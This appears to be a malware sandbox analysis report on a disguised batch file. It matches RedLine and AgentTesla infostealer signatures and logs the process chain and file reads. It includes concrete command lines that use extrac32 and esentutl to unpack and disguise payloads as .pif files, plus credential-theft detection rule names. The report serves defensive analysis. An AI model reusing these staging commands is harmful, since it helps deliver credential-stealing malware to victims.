Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@25/11@3/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031C7FD4 GetDiskFreeSpaceA,

3_2_031C7FD4

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D6DC8 CoCreateInstance,

3_2_031D6DC8

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB06544.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_1_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\xrbjyllC.pif

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z1Transaction_ID_REF2418_cmd.bat

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
